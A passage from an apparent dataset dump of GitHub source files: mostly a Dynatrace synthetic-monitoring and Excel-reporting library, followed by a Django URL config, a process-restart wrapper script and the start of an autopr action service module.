[\n {\n \"type\": \"navigate\",\n \"description\": 'Loading of \"' + monitor_url + '\"',\n \"url\": monitor_url,\n \"wait\": {\"waitFor\": \"page_complete\"},\n }\n ]\n script = {\n \"type\": \"availability\",\n \"version\": \"1.0\",\n \"configuration\": configuration,\n \"events\": events,\n }\n if validation_text:\n script[\"validate\"] = [\n {\n \"type\": \"text_match\",\n \"failIfFound\": False,\n \"isRegex\": False,\n \"match\": validation_text,\n }\n ]\n return script\n\n @staticmethod\n def single_url_http_script(monitor_url, validation_text=None):\n script = {\n \"version\": \"1.0\",\n \"requests\": [\n {\n \"description\": 'Loading of \"' + monitor_url + '\"',\n \"url\": monitor_url,\n \"method\": \"GET\",\n \"requestBody\": \"\",\n \"configuration\": {\n \"acceptAnyCertificate\": True,\n \"followRedirects\": True,\n },\n \"preProcessingScript\": \"\",\n \"postProcessingScript\": \"\",\n }\n ],\n }\n if validation_text:\n script[\"validation\"] = {\n \"rules\": [\n {\n \"value\": validation_text,\n \"failIfFound\": False,\n \"type\": \"patternConstraint\",\n }\n ],\n \"rulesChaining\": \"and\",\n }\n return script\n\n @staticmethod\n def _monitor_to_payload(monitor):\n payload = copy.deepcopy(monitor)\n if \"entityId\" in payload.keys():\n payload[\"tags\"] = [tag[\"key\"] for tag in payload[\"tags\"]]\n payload.pop(\"createdFrom\", None)\n\n payload.pop(\"events\", None)\n payload.pop(\"requests\", None)\n payload[\"manuallyAssignedApps\"] = []\n return payload\n\n def deep_update(self, target, src):\n for k, v in src.items():\n if isinstance(v, list):\n if not k in target:\n target[k] = copy.deepcopy(v)\n else:\n target[k].extend(v)\n elif isinstance(v, dict):\n if not k in target:\n target[k] = copy.deepcopy(v)\n else:\n self.deep_update(target[k], v)\n elif isinstance(v, set):\n if k not in target:\n target[k] = v.copy()\n else:\n target[k].update(v.copy())\n else:\n target[k] = copy.copy(v)\n\n def date_calc(self, date_option=None):\n # ['Yesterday','WeekToDate','MonthToDate','LastMonth','LastWeek','Last24Hours','Last7Days','Last30Days','QuarterToDate','LastQuarter']\n def t_min(_date):\n return tz.normalize(_date).replace(\n hour=0, minute=0, second=0, microsecond=0\n )\n\n def t_max(_date):\n return tz.normalize(_date).replace(\n hour=23, minute=59, second=59, microsecond=999999\n )\n\n _rptdt = collections.namedtuple(\n \"rptdt\",\n \"start_time,end_time,start_time_epoch,end_time_epoch,name,resolution,time_period,tz\",\n )\n now = datetime.datetime.now(pytz.timezone(self.time_zone))\n tz = now.tzinfo\n first_day_of_current_week = t_min(\n now - datetime.timedelta(days=(now.weekday() + 1) % 7)\n )\n first_day_of_current_month = t_min(\n datetime.datetime(now.year, now.month, 1, tzinfo=tz)\n )\n first_day_of_previous_week = t_min(\n first_day_of_current_week - datetime.timedelta(days=7)\n )\n last_day_previous_week = t_max(\n first_day_of_previous_week + datetime.timedelta(days=6)\n )\n last_day_of_previous_month = t_max(\n first_day_of_current_month - datetime.timedelta(days=1)\n )\n first_day_of_previous_month = t_min(\n datetime.datetime(\n last_day_of_previous_month.year,\n last_day_of_previous_month.month,\n 1,\n tzinfo=tz,\n )\n )\n first_day_current_quarter = t_min(\n datetime.datetime(now.year, (now.month - 1) // 3 * 3 + 1, 1, tzinfo=tz)\n )\n nextQtFirstDy = datetime.datetime(\n now.year + (1 if now.month > 9 else 0),\n 1\n if ((now.month - 1) // 3 * 3 + 4) == 13\n else ((now.month - 1) // 3 * 3 + 4),\n 1,\n tzinfo=tz,\n )\n last_day_current_quarter = t_max((nextQtFirstDy - datetime.timedelta(days=1)))\n last_day_previous_quarter = t_max(\n (first_day_current_quarter - datetime.timedelta(days=1))\n )\n first_day_previous_quarter = t_min(\n datetime.datetime(\n last_day_previous_quarter.year,\n (last_day_previous_quarter.month - 1) // 3 * 3 + 1,\n 1,\n tzinfo=tz,\n )\n )\n\n if date_option == \"WeekToDate\":\n start_time = first_day_of_current_week\n end_time = now\n elif date_option == \"MonthToDate\":\n start_time = first_day_of_current_month\n end_time = now\n elif date_option == \"LastMonth\":\n start_time = first_day_of_previous_month\n end_time = last_day_of_previous_month\n elif date_option == \"LastWeek\":\n start_time = first_day_of_previous_week\n end_time = last_day_previous_week\n elif date_option == \"Last24Hours\":\n start_time = tz.normalize((now - datetime.timedelta(hours=24)))\n end_time = now\n elif date_option == \"Last7Days\":\n start_time = tz.normalize(now - datetime.timedelta(days=7))\n end_time = now\n elif date_option == \"Last30Days\":\n start_time = tz.normalize(now - datetime.timedelta(days=30))\n end_time = now\n elif date_option == \"QuarterToDate\":\n start_time = first_day_current_quarter\n end_time = now\n elif date_option == \"LastQuarter\":\n start_time = first_day_previous_quarter\n end_time = last_day_previous_quarter\n else:\n date_option = \"Yesterday\"\n start_time = t_min(now - datetime.timedelta(days=1))\n end_time = start_time.replace(\n hour=23, minute=59, second=59, microsecond=999999\n )\n time_period = (\n date_option\n + \" (\"\n + start_time.strftime(\"%d-%b-%Y %H:%M %Z\")\n + \" - \"\n + end_time.strftime(\"%d-%b-%Y %H:%M %Z\")\n + \")\"\n )\n resolution = \"1d\"\n\n if date_option in [\"Yesterday\", \"Last24Hours\"]:\n resolution = \"1h\"\n\n return _rptdt(\n start_time=start_time.isoformat(timespec=\"minutes\"),\n end_time=end_time.isoformat(timespec=\"minutes\"),\n start_time_epoch=int(start_time.astimezone(pytz.utc).timestamp()) * 1000,\n end_time_epoch=int(end_time.astimezone(pytz.utc).timestamp()) * 1000,\n name=date_option,\n resolution=resolution,\n time_period=time_period,\n tz=tz,\n )\n\n def availability_calc(self, success, failure):\n if (success is None) or (failure is None):\n return 0.00\n if isinstance(success, int) and isinstance(failure, int):\n return float(\"%.2f\" % (success / (success + failure)))\n if isinstance(success, dict) and isinstance(failure, dict):\n availability = {}\n for tstamp in success:\n availability[tstamp] = self.availability_calc(\n success[tstamp], failure[tstamp]\n )\n return {\"Availability\": availability}\n\n def get_monitors(self, params=None):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/monitors\", params)\n\n def get_monitor(self, entity_id):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/monitors/\" + entity_id)\n\n def get_monitor_details(self, params=None, monitors=None):\n monitor_details = {}\n if not monitors:\n monitors = self.get_monitors(params)\n if monitors:\n for monitor in tqdm.tqdm(monitors[\"monitors\"], desc=\"Getting Montiors\"):\n _data = self.get_monitor(monitor[\"entityId\"])\n if _data:\n _data[\"tags\"] = [tag[\"key\"] for tag in _data[\"tags\"]]\n monitor_details[_data[\"entityId\"]] = _data\n time.sleep(self._sleep_seconds)\n return monitor_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"monitor details\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def post_monitor(self, monitor):\n monitor.pop(\"entityId\", None)\n data = self._monitor_to_payload(monitor)\n return self._rest_call_(\"POST\", \"/api/v1/synthetic/monitors\", None, data)\n\n def put_monitor(self, monitor):\n data = self._monitor_to_payload(monitor)\n return self._rest_call_(\n \"PUT\", \"/api/v1/synthetic/monitors/\" + monitor[\"entityId\"], None, data\n )\n\n def delete_monitor(self, entity_id):\n return self._rest_call_(\"DELETE\", \"/api/v1/synthetic/monitors/\" + entity_id)\n\n def get_locations(self, params=None):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/locations\", params)\n\n def get_location(self, entityId):\n return self._rest_call_(\"GET\", \"/api/v1/synthetic/locations/\" + entityId)\n\n def get_location_details(self, params=None):\n location_details = {}\n locations = self.get_locations(params)\n if \"locations\" in locations:\n locations = locations[\"locations\"]\n for location in tqdm.tqdm(locations, desc=\"Getting locations\"):\n location_id = location.get(\"entityId\")\n location_details[location_id] = self.get_location(location_id)\n time.sleep(self._sleep_seconds)\n return location_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"location details\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def get_problems(self, params=None):\n return self._rest_call_(\"GET\", \"/api/v1/problem/feed\", params)\n\n def _get_metrics_query(self, params):\n return self._rest_call_(\"GET\", \"/api/v2/metrics/query\", params)\n\n def get_metrics_query(self, params, trans_by=True):\n metrics_query = {}\n _data = {}\n query = self._get_metrics_query(params)\n if query:\n for metric in query[\"result\"]:\n metric_id = metric.pop(\"metricId\")\n metrics_query[metric_id] = metric\n while query.get(\"nextPageKey\", False):\n time.sleep(self._sleep_seconds)\n params = self.metrics_query_params()\n params[\"nextPageKey\"] = query.get(\"nextPageKey\")\n query = self._get_metrics_query(params)\n if query:\n for metric in query[\"result\"]:\n metric_id = metric.pop(\"metricId\")\n _data[metric_id] = metric\n self.deep_update(metrics_query, _data)\n else:\n break\n if trans_by:\n metrics_query = self.trans_query(metrics_query)\n return metrics_query\n\n def get_all_metrics(self):\n params = self.metrics_params()\n all_metrics = {}\n metrics = self.get_metrics(params)\n if metrics:\n for metric in metrics[\"metrics\"]:\n all_metrics[metric.pop(\"metricId\")] = metric\n while metrics.get(\"nextPageKey\", False):\n time.sleep(self._sleep_seconds)\n params = self.metrics_params()\n params[\"nextPageKey\"] = metrics[\"nextPageKey\"]\n metrics = self.get_metrics(params)\n if metrics:\n for metric in metrics[\"metrics\"]:\n all_metrics[metric.pop(\"metricId\")] = metric\n else:\n break\n return all_metrics\n\n def get_metrics(self, params):\n return self._rest_call_(\"GET\", \"/api/v2/metrics/\", params)\n\n def get_metric(self, metricId):\n return self._rest_call_(\"GET\", \"/api/v2/metrics/\" + metricId)\n\n def _get_audit_logs(self, params):\n return self._rest_call_(\"GET\", \"/api/v2/auditlogs\", params)\n\n def get_audit_logs(self, params=None):\n _data = self._get_audit_logs(params)\n if _data:\n data = _data[\"auditLogs\"]\n while _data.get(\"nextPageKey\", False):\n time.sleep(self._sleep_seconds)\n params = synth.audit_logs_params()\n params[\"nextPageKey\"] = _data[\"nextPageKey\"]\n _data = self._get_audit_logs(params)\n if _data:\n data = data + _data[\"auditLogs\"]\n else:\n break\n return data\n\n def post_timeseries(self, data):\n timeseries_id = urllib.parse.quote(data[\"timeseriesId\"])\n return self._rest_call_(\n \"POST\", \"/api/v1/timeseries/\" + timeseries_id, None, data\n )\n\n def get_timeseries(self, params):\n timeseries_id = urllib.parse.quote(params.pop(\"timeseriesId\"))\n return self._rest_call_(\"GET\", \"/api/v1/timeseries/\" + timeseries_id, params)\n\n def get_metrics_dimensions(self, metricSelector):\n def tree():\n return collections.defaultdict(tree)\n\n dimensions = tree()\n data = self.get_metric(metricSelector)\n if data:\n metric_id = data[\"metricId\"]\n dimensions[metric_id][\"displayName\"] = data[\"displayName\"]\n for dimension in data[\"dimensionDefinitions\"]:\n dimensions[metric_id][\"dimensions\"][dimension[\"name\"]] = dimension[\n \"index\"\n ]\n return json.loads(json.dumps(dimensions))\n else:\n msg = \"Something went wrong getting \"\n msg += \"metrics dimensions\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def get_notifications(self):\n return self._rest_call_(\"GET\", \"/api/config/v1/notifications\")\n\n def get_notification(self, notification_id):\n return self._rest_call_(\n \"GET\", \"/api/config/v1/notifications/\" + notification_id\n )\n\n def get_notification_details(self):\n notification_details = {}\n notifications = self.get_notifications()\n if notifications:\n for notification in tqdm.tqdm(\n notifications[\"values\"], desc=\"Getting notifications\"\n ):\n data = self.get_notification(notification[\"id\"])\n notification_details[notification[\"id\"]] = data\n time.sleep(self._sleep_seconds)\n return notification_details\n else:\n return None\n\n def get_alerting_profiles(self):\n return self._rest_call_(\"GET\", \"/api/config/v1/alertingProfiles\")\n\n def get_alerting_profile(self, profile_id):\n return self._rest_call_(\"GET\", \"/api/config/v1/alertingProfiles/\" + profile_id)\n\n def get_alerting_profile_details(self):\n alerting_profile_details = {}\n alerting_profiles = self.get_alerting_profiles()\n if alerting_profiles:\n for alerting_profile in tqdm.tqdm(\n alerting_profiles[\"values\"], desc=\"Alerting Profiles\"\n ):\n _data = self.get_alerting_profile(alerting_profile[\"id\"])\n alerting_profile_details[alerting_profile[\"id\"]] = _data\n time.sleep(self._sleep_seconds)\n return alerting_profile_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"alerting profile details\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def get_maintenance_windows(self):\n return self._rest_call_(\"GET\", \"/api/config/v1/maintenanceWindows\")\n\n def get_maintenance_window(self, mw_id):\n return self._rest_call_(\"GET\", \"/api/config/v1/maintenanceWindows/\" + mw_id)\n\n def get_maintenance_window_details(self):\n maintenance_window_details = {}\n maintenance_windows = self.get_maintenance_windows()\n if maintenance_windows:\n for maintenanceWindow in tqdm.tqdm(\n maintenance_windows[\"values\"], desc=\"Getting maintenance windows\"\n ):\n data = self.get_maintenance_window(maintenanceWindow[\"id\"])\n maintenance_window_details[maintenanceWindow[\"id\"]] = data\n time.sleep(self._sleep_seconds)\n return maintenance_window_details\n else:\n msg = \"Something went wrong getting \"\n msg += \"maintenance window details\"\n msg += \". Check log file.\"\n print(msg)\n sys.tracebacklimit = 0\n sys.exit()\n\n def post_maintenance_window(self, data):\n if \"id\" in data:\n data.pop(\"id\", None)\n return self._rest_call_(\"POST\", \"/api/config/v1/maintenanceWindows\", None, data)\n\n def put_maintenance_window(self, mw_id, data):\n return self._rest_call_(\n \"PUT\", \"/api/config/v1/maintenanceWindows/\" + mw_id, None, data\n )\n\n def delete_maintenance_window(self, mw_id):\n return self._rest_call_(\"DELETE\", \"/api/config/v1/maintenanceWindows/\" + mw_id)\n\n def get_usql_query(self, params):\n return self._rest_call_(\"GET\", \"/api/v1/userSessionQueryLanguage/table\", params)\n\n def dump_file(self, data, file_name=None):\n date_string = datetime.datetime.now().strftime(\"%m%d%Y%H%M%S%f\")\n file_name = (\n (file_name + \".json\") if file_name else (\"data\" + date_string + \".json\")\n )\n data_file = os.path.join(self.output_path, file_name)\n with open(data_file, \"w\") as dat_file:\n dat_file.write(json.dumps(data, indent=3))\n return data_file\n\n def trans_query(self, metric_data):\n trans = {}\n aggs = [\"avg\", \"count\", \"max\", \"min\", \"percentile\", \"sum\"]\n if metric_data:\n for metric, data in metric_data.items():\n meta_metric = self.get_metric(metric)\n dims_metric = {}\n for dim in meta_metric[\"dimensionDefinitions\"]:\n dims_metric[dim[\"index\"]] = dim[\"name\"]\n meta_trans = (\n self.get_metric(metric.replace(\":names\", \"\"))\n if \":names\" in metric\n else meta_metric\n )\n dims_trans = {}\n for dim in meta_trans[\"dimensionDefinitions\"]:\n dims_trans[dim[\"index\"]] = dim[\"name\"]\n metric_name = meta_metric[\"displayName\"]\n if any(agg in metric for agg in aggs):\n for agg in aggs:\n if agg in metric:\n if \"percentile\" in agg:\n _idx = metric.find(\"percentile\")\n percentile = metric[_idx : metric.find(\")\", _idx) + 1]\n metric_name = percentile + \" \" + metric_name\n else:\n metric_name = agg + \" \" + metric_name\n\n for data_point in data[\"data\"]:\n dimensions = data_point[\"dimensions\"]\n dims_data = {}\n _idx = 0\n for dim in dimensions:\n dims_data[dims_metric[_idx]] = dim\n _idx += 1\n timestamps = data_point[\"timestamps\"]\n values = data_point[\"values\"]\n if len(timestamps) > 1:\n values = dict(zip(timestamps, values))\n else:\n values = values.pop()\n dstr = \"\"\n for idx, dim in dims_trans.items():\n if dim + \"_name\" in dims_data:\n dstr = (\n dstr\n + '{\"'\n + dims_data[dim]\n + \"|\"\n + dims_data[dim + \"_name\"].translate(\n str.maketrans(\"\", \"\", '\\t\\n\\r\\x0b\\x0c\"')\n )\n + '\":'\n )\n else:\n dstr = dstr + '{\"' + dims_data[dim] + '\":'\n dstr = (\n dstr\n + '{\"'\n + metric_name.strip()\n + '\":'\n + str(values).strip()\n + \"}\"\n )\n for _idx in dims_trans:\n dstr = dstr.strip() + \"}\"\n _data = ast.literal_eval(dstr.strip())\n\n self.deep_update(trans, _data)\n return trans\n\n\nclass cls_report(object):\n def __init__(self, config=None, report_name=None):\n self.output_path = config.output_path\n\n credentials = config.config_to_dict(\"credentials\")\n report = config.config_to_dict(\"report\")\n\n self.time_zone = report.get(\"time_zone\", tzlocal.get_localzone().zone)\n self.prepared_for = report.get(\"prepared_for\", credentials.get(\"tenant\", \"\"))\n self.file_ident = report.get(\"file_ident\", False)\n\n self.email_config = config.config_to_dict(\"email_config\")\n\n self.report_date = None\n\n self._loc = collections.namedtuple(\"loc\", \"row,col\")\n self.header = collections.namedtuple(\"header\", \"col_title,col_format,col_width\")\n self.max_col = 3\n self.max_row = None\n\n self.blue = \"#5B9BD5\"\n self.font_yellow = \"#9C5700\"\n self.bg_yellow = \"#FFEB9C\"\n self.font_red = \"#9C0006\"\n self.bg_red = \"#FFC7CE\"\n self.font_green = \"#006100\"\n self.bg_green = \"#C6EFCE\"\n\n if report_name:\n self.xl_workbook(report_name)\n\n def xl_workbook(self, report_name):\n self.report_name = re.sub(\"[^0-9a-zA-Z]+\", \"_\", report_name)\n self.report_file = os.path.join(self.output_path, self.report_name + \".xlsx\")\n self.workbook = xlsxwriter.Workbook(\n self.report_file, {\"strings_to_urls\": False}\n )\n\n self.title_format = self.workbook.add_format(\n {\n \"align\": \"center\",\n \"bold\": True,\n \"text_wrap\": True,\n \"bg_color\": self.blue,\n \"border\": True,\n \"font_size\": 14,\n }\n )\n self.sub_title_format = self.workbook.add_format(\n {\n \"align\": \"left\",\n \"bold\": True,\n \"text_wrap\": True,\n \"border\": True,\n \"font_size\": 12,\n }\n )\n self.label_format = self.workbook.add_format(\n {\"align\": \"left\", \"font_size\": 10, \"border\": True, \"text_wrap\": True}\n )\n self.data_format = self.workbook.add_format(\n {\"align\": \"right\", \"font_size\": 10, \"border\": True, \"num_format\": \"0.00\"}\n )\n self.data_green_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_color\": self.font_green,\n \"bg_color\": self.bg_green,\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"0.00\",\n }\n )\n self.data_yellow_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_color\": self.font_yellow,\n \"bg_color\": self.bg_yellow,\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"0.00\",\n }\n )\n self.data_red_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_color\": self.font_red,\n \"bg_color\": self.bg_red,\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"0.00\",\n }\n )\n self.percent_format = self.workbook.add_format(\n {\"align\": \"right\", \"font_size\": 10, \"border\": True, \"num_format\": \"0.00%\"}\n )\n self.count_format = self.workbook.add_format(\n {\"align\": \"right\", \"font_size\": 10, \"border\": True, \"num_format\": \"0\"}\n )\n self.date_format = self.workbook.add_format(\n {\n \"align\": \"right\",\n \"font_size\": 10,\n \"border\": True,\n \"num_format\": \"mm-dd-yyyy\",\n }\n )\n self.cell_label_format = self.workbook.add_format({\"text_wrap\": False})\n self.cell_data_format = self.workbook.add_format({\"num_format\": \"0.00\"})\n self.cell_percent_format = self.workbook.add_format({\"num_format\": \"0.00%\"})\n self.cell_count_format = self.workbook.add_format({\"num_format\": \"0\"})\n self.cell_date_format = self.workbook.add_format({\"num_format\": \"mm-dd-yyyy\"})\n\n @staticmethod\n def accumulate(data, metric):\n accumulator = None\n count = 0\n if data:\n for k, v in data.items():\n if metric in v:\n if v[metric] is not None:\n if accumulator is None:\n accumulator = v[metric]\n else:\n accumulator = accumulator + v[metric]\n count += 1\n return accumulator, count\n\n def format_timestamp(self, tstamp):\n tstamp_ts = datetime.datetime.fromtimestamp(int(tstamp) / 1000)\n tstamp_ts = tstamp_ts.astimezone(self.report_date.tz)\n if self.report_date.resolution in [\"1h\"]:\n timestamp = tstamp_ts.strftime(\"%H\")\n else:\n timestamp = tstamp_ts.strftime(\"%m-%d-%Y\")\n return timestamp\n\n def timestamp_header(self):\n if self.report_date.resolution in [\"1h\"]:\n header = [\n self.header(\n col_title=\"timestamp\",\n col_format=self.cell_label_format,\n col_width=25,\n )\n ]\n else:\n header = [\n self.header(\n col_title=\"timestamp\",\n col_format=self.cell_date_format,\n col_width=25,\n )\n ]\n return header\n\n def xl_add_sheet(self, sheet_name=None, default_row_height=18):\n if sheet_name:\n sheet_name = re.sub(\"[^0-9a-zA-Z]+\", \"\", sheet_name)[:30]\n worksheet = self.workbook.add_worksheet(sheet_name)\n worksheet.set_column(0, 0, 2)\n worksheet.set_default_row(height=default_row_height)\n else:\n worksheet = self.workbook.add_worksheet()\n return worksheet\n\n def xl_title_block(\n self,\n worksheet,\n anchor,\n title,\n compact=False,\n title_data=None,\n title_format=None,\n sub_title_format=None,\n ):\n if title_format:\n title_format = self.workbook.add_format(title_format)\n else:\n title_format = self.title_format\n if sub_title_format:\n sub_title_format = self.workbook.add_format(sub_title_format)\n else:\n sub_title_format = self.sub_title_format\n row = anchor.row\n col = anchor.col\n _title_data = title_data\n prepared_for = self.prepared_for\n refresh_date = datetime.datetime.now().strftime(\"%d-%b-%Y %H:%M\")\n time_period = self.report_date.time_period if self.report_date else refresh_date\n worksheet.set_row(row, 18)\n worksheet.merge_range(row, col, row, self.max_col, title, title_format)\n if compact:\n title_data = [\"Timeperiod: \" + time_period]\n else:\n title_data = [\n \"Prepared for: \" + prepared_for,\n \"Refresh date: \" + refresh_date,\n \"Timeperiod: \" + time_period,\n ]\n if _title_data:\n title_data = title_data + _title_data\n for row_data in title_data:\n row += 1\n worksheet.set_row(row, 18)\n worksheet.merge_range(\n row, col, row, self.max_col, row_data, sub_title_format\n )\n self.max_row = row\n\n def xl_table_block(self, worksheet, anchor, header, data, title_row_height=None):\n col_fmt = {}\n col = anchor.col\n row = anchor.row\n for col_data in header:\n worksheet.write(row, col, col_data.col_title, self.title_format)\n col_fmt[col] = col_data.col_format\n worksheet.set_column(col, col, col_data.col_width)\n col += 1\n if title_row_height:\n worksheet.set_row(row, title_row_height)\n for row_data in data:\n col = anchor.col\n row += 1\n for value in row_data:\n if value is None:\n value = \"\"\n worksheet.write(row, col, value, col_fmt[col])\n col += 1\n self.max_row = row\n self.max_col = col\n\n def xl_chart_block(\n self,\n worksheet,\n anchor,\n header,\n data,\n title,\n chart_type,\n data_cols,\n height,\n width,\n no_legend=False,\n legend_pos=\"bottom\",\n ):\n _series = collections.namedtuple(\"series\", \"name,categories,values\")\n fudge = 5\n data_anchor = self._loc(row=0, col=0)\n data_sheet = self.workbook.add_worksheet()\n if not data:\n data = [\"\", \"\"]\n data_cols = [1]\n no_legend = True\n self.xl_table_block(data_sheet, data_anchor, header, data)\n chart = self.workbook.add_chart({\"type\": chart_type})\n\n for data_col in data_cols:\n name = (\n \"=\"\n + data_sheet.name\n + \"!\"\n + xlsxwriter.utility.xl_rowcol_to_cell(0, data_col, True, True)\n )\n categories = (\n \"=\"\n + data_sheet.name\n + \"!\"\n + xlsxwriter.utility.xl_range_abs(1, 0, self.max_row, 0)\n )\n values = (\n \"=\"\n + data_sheet.name\n + \"!\"\n + xlsxwriter.utility.xl_range_abs(1, data_col, self.max_row, data_col)\n )\n series = _series(name=name, categories=categories, values=values)\n chart.add_series(\n {\n \"name\": series.name,\n \"marker\": {\"type\": \"square\"},\n \"categories\": series.categories,\n \"values\": series.values,\n }\n )\n\n chart.set_y_axis({\"min\": 0})\n chart.set_x_axis({\"name\": \"\"})\n chart.set_title({\"name\": title})\n chart.set_legend({\"position\": legend_pos})\n chart.set_size({\"height\": height, \"width\": width})\n if no_legend:\n chart.set_legend({\"none\": True})\n worksheet.insert_chart(\n anchor.row, anchor.col, chart, {\"x_offset\": fudge, \"y_offset\": 0}\n )\n data_sheet.hide()\n\n def xl_close(self):\n while True:\n try:\n self.workbook.close()\n except xlsxwriter.exceptions.FileCreateError as e:\n decision = input(\n \"Exception caught in workbook.close(): %s\\n\"\n \"Please close the file if it is open in Excel.\\n\"\n \"Try to write file again? [Y/n]: \" % e\n )\n if decision != \"n\":\n continue\n break\n\n @staticmethod\n def check_email_config(email_config):\n check = True\n fields = [\n \"email_server\",\n \"email_port\",\n \"email_server_username\",\n \"email_server_password\",\n \"email_from\",\n ]\n for check_field in fields:\n if check_field not in email_config:\n check = False\n return check\n\n def send_mail(self, notification_name, synth):\n if self.check_email_config(self.email_config):\n if self.report_date:\n time_period = self.report_date.time_period\n else:\n time_period = datetime.datetime.now().strftime(\"%d-%b-%Y %H:%M %Z\")\n email_text = \"Report: {}\\nDate range: {}\".format(\n self.report_name, time_period\n )\n data = synth.get_notifications()\n for notification in data[\"values\"]:\n if notification[\"name\"] == notification_name:\n notification_id = notification[\"id\"]\n break\n if notification_id:\n data = synth.get_notification(notification_id)\n receivers = data[\"receivers\"]\n cc_receivers = data[\"ccReceivers\"]\n msg = MIMEMultipart()\n msg[\"From\"] = self.email_config[\"email_from\"]\n msg[\"To\"] = COMMASPACE.join(receivers + cc_receivers)\n msg[\"Subject\"] = self.report_name + \" for: \" + time_period\n try:\n msg.attach(MIMEText(email_text, \"plain\"))\n attachment = open(self.report_file, \"rb\")\n payload = MIMEBase(\"application\", \"octet-stream\")\n payload.set_payload((attachment).read())\n encoders.encode_base64(payload)\n payload.add_header(\n \"Content-Disposition\",\n \"attachment; filename= %s\" % self.report_name + \".xlsx\",\n )\n msg.attach(payload)\n session = smtplib.SMTP(\n self.email_config[\"email_server\"],\n self.email_config[\"email_port\"],\n )\n session.starttls()\n session.login(\n self.email_config[\"email_server_username\"],\n self.email_config[\"email_server_password\"],\n )\n text = msg.as_string()\n session.sendmail(self.email_config[\"email_from\"], receivers, text)\n session.quit()\n except smtplib.SMTPException as error:\n logging.error(\n \"Problem with SMTP server: \" + error.smtp_error.decode(\"utf-8\")\n )\n else:\n print(\"No notification of \" + notification_name + \" found\")\n logging.error(\"No notification of \" + notification_name + \" found\")\n else:\n print(\"SMTP server settings are not correct. Check config\")\n logging.error(\"SMTP server settings are not correct. Check config\")\n\n\nif __name__ == \"__main__\":\n config = cls_config()\n synth = cls_synth(config)\n report = cls_report(config)\n","repo_name":"Dynatrace/snippets","sub_path":"api/synthetic/Service_Level_Summary/_synth_lib.py","file_name":"_synth_lib.py","file_ext":"py","file_size_in_byte":45562,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"16764992792","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import include, path\n\n\n\n\nurlpatterns = [\n path('', include('apps.accounts.urls')),\n path('', include('apps.shop.urls')),\n path('', include('apps.utils.urls')),\n path('admin-store/', include('apps.adminstore.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"anferubu/tecnobox","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"794411623","text":"import time\nimport subprocess as sub\nimport os\n\nexp_running = 'project1/experiments_all.py'\ncount = 0\n\ntime.sleep(1)\nprint('Hello this is the exp_wrapper!')\n\nwhile True:\n if count > 20:\n print('Restarted 20 times, killing process to be safe.')\n break\n process = sub.run(['pgrep', '-af', 'python'], stdout=sub.PIPE, stderr=sub.PIPE)\n time.sleep(10)\n if exp_running in process.stdout.decode():\n pass\n else:\n time.sleep(11)\n process = sub.run(['pgrep', '-af', 'python'], stdout=sub.PIPE, stderr=sub.PIPE)\n if exp_running in process.stdout.decode():\n print('Lol, saved it.')\n continue\n #os.system('conda activate ts')\n os.system(f'nohup python {exp_running} &')\n print('Restarted script.')\n count += 1\n\n print('Experiments running. Sleeping for 60s.')\n time.sleep(60)","repo_name":"marcoHoev/time-series","sub_path":"project1/exp_wrapper.py","file_name":"exp_wrapper.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9461395406","text":"import asyncio\nimport json\nimport traceback\nimport typing\nfrom typing import Any, Optional, Collection, Type, TypeVar, Iterable\n\nimport jinja2\nimport pydantic\nfrom git.repo import Repo\nfrom pydantic import ValidationError, BaseModel\n\nfrom autopr.actions.base import get_actions_dict, Action, Outputs, Inputs\nfrom autopr.log_config import get_logger\nfrom autopr.models.config.transform import TransformsInto\nfrom autopr.models.executable import ContextDict, ExecutableId\n\nfrom autopr.models.config.elements import ActionConfig, IterableActionConfig, ValueDeclaration\nfrom autopr.services.cache_service import CacheService, ShelveCacheService\nfrom autopr.services.commit_service import CommitService\nfrom autopr.services.platform_service import PlatformService\nfrom autopr.services.publish_service import PublishService\nfrom autopr.services.utils import truncate_strings, format_for_publishing\n\nActionSubclass = Action[Any, Any]\n\n\nclass ActionService:\n # class Finished(Action):\n # id = \"finished\"\n\n def __init__(\n self,\n repo: Repo,\n cache_dir: str,\n platform_service: PlatformService,\n commit_service: CommitService,\n num_reasks: int = 3,\n ):\n self.repo = repo\n self.cache_dir = cache_dir\n self.platform_service = platform_service\n self.commit_service = commit_service\n self.num_reasks = num_reasks\n\n # Load all actions in the `autopr/actions` directory\n self.actions: dict[ExecutableId, type[ActionSubclass]] = get_actions_dict()\n\n self.log = get_logger(service=\"action_service\")\n\n def find_action(self, id_: ExecutableId) -> Optional[type[Action[Any, Any]]]:\n if id_ in self.actions:\n return self.actions[id_]\n return None\n\n def instantiate_action(\n self,\n action_type: Type[Action[Inputs, Outputs]],\n publish_service: PublishService,\n ) -> Action[Inputs, Outputs]:\n cache_service = ShelveCacheService(\n cache_dir=self.cache_dir,\n action_id=action_type.id,\n )\n return action_type(\n repo=self.repo,\n publish_service=publish_service,\n platform_service=self.platform_service,\n commit_service=self.commit_service,\n cache_service=cache_service,\n )\n\n def get_action_inputs(\n self,\n action_type: Type[Action[Inputs, Outputs]],\n action_inputs: Inputs,\n context: ContextDict,\n 